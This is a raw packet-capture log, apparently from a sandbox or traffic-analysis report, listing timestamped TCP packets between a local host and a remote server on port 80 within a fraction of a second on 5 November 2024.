Nov 5, 2024 18:46:11.199846029 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.199856997 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.199867010 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.199878931 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.199888945 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.199894905 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.199901104 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.199909925 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.199909925 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.199920893 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.199929953 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.199939013 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.199970961 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.199986935 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.199996948 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.199997902 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.199997902 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.200006008 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.200007915 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.200031042 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.200053930 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.200057983 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.200069904 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.200078964 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.200089931 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.200098991 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.200103998 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.200110912 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.200123072 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.200156927 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.200304031 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.200314999 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.200325012 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.200335026 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.200346947 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.200356960 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.200356960 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.200371981 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.200408936 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.200550079 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.200560093 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.200570107 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.200578928 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.200588942 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.200598001 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.200598955 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.200609922 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.200622082 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.200629950 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.200633049 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.200644016 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.200654984 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.200654984 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.200664997 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.200669050 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.200675011 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.200684071 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.200685024 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.200695038 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.200695992 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.200706959 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.200712919 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.200723886 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.200742960 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.200762987 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.200910091 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.200921059 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.200931072 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.200941086 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.200952053 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.200958014 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.200965881 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.201023102 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.201035976 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.201046944 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.201059103 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.201071024 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.201072931 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.201085091 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.201092005 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.201097012 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.201132059 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.201157093 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.201178074 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.201191902 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.201201916 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.201211929 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.201224089 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.201227903 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.201234102 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.201242924 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.201267958 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.201267958 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.201302052 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.201313019 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.201320887 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.201333046 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.201340914 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.201342106 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.201351881 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.201359034 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.201363087 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.201373100 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.201384068 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.201395035 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.201396942 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.201405048 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.201421022 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.201425076 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.201456070 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.201600075 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.201611042 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.201620102 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.201647997 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.201688051 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.201756001 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.201766968 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.201776028 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.201785088 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.201796055 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.201802969 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.201816082 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.201826096 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.201836109 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.201833963 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.201836109 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.201845884 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.201859951 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.201869965 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.201870918 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.201880932 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.201886892 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.201891899 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.201901913 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.201908112 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.201913118 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.201921940 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.201931000 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.201931000 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.201941967 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.201951981 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.201957941 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.201961040 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.201972961 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.201977968 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.201982021 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.202007055 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.202027082 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.202173948 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.202199936 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.202209949 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.202266932 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.202408075 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.202419043 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.202441931 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.202451944 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.202461958 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.202464104 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.202470064 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.202471972 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.202481985 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.202491999 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.202497005 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.202502966 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.202512980 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.202522039 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.202522993 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.202528954 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.202532053 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.202543020 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.202543974 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.202553988 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.202564955 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.202574968 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.202575922 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.202585936 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.202594042 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.202598095 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.202608109 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.202613115 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.202619076 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.202646971 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.202660084 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.202836037 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.202883005 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.202977896 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.202987909 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.202997923 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.203007936 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.203017950 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.203021049 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.203027964 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.203036070 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.203038931 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.203049898 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.203057051 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.203058958 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.203071117 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.203078032 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.203080893 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.203103065 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.203124046 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.203131914 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.203142881 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.203159094 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.203162909 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.203170061 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.203178883 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.203181982 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.203186989 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.203190088 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.203198910 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.203206062 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.203210115 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.203212976 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.203221083 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.203231096 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.203233004 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.203239918 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.203250885 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.203257084 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.203262091 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.203263044 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.203272104 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.203280926 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.203293085 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.203295946 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.203306913 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.203322887 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.203326941 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.203326941 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.203355074 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.203361988 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.203877926 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.203886986 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.203896999 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.203907013 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.203917027 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.203917027 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.203927040 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.203934908 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.203938007 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.203946114 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.203953028 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.203954935 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.203964949 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.203973055 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.203974962 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.203979015 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.203984976 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.203994036 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.204001904 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.204006910 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.204024076 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.204030037 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.204034090 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.204042912 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.204047918 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.204051971 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.204062939 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.204070091 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.204073906 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.204088926 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.204090118 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.204099894 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.204109907 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.204111099 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.204121113 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.204121113 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.204130888 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.204140902 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.204140902 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.204152107 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.204160929 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.204170942 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.204173088 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.204178095 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.204180956 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.204190969 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.204200983 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.204200983 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.204210997 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.204221964 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.204232931 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.204235077 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.204241037 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.204243898 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.204253912 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.204260111 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.204267025 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.204277039 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.204286098 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.204287052 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.204297066 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.204298973 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.204315901 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.204363108 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.204652071 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.204663038 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.204673052 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.204683065 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.204693079 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.204703093 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.204705954 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.204714060 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.204722881 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.204727888 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.204739094 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.204766035 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.204797029 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.204808950 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.204823017 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.204833984 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.204843044 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.204844952 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.204855919 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.204859018 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.204865932 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.204874992 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.204885006 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.204890013 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.204895020 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.204905033 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.204905987 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.204911947 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.204916000 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.204924107 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.204936981 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.204968929 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.226979971 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.226990938 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.226996899 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.227089882 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.227111101 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.227196932 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.269788027 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.269807100 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.269817114 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.269881964 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.269921064 CET	80	49804	31.41.244.11	192.168.2.4
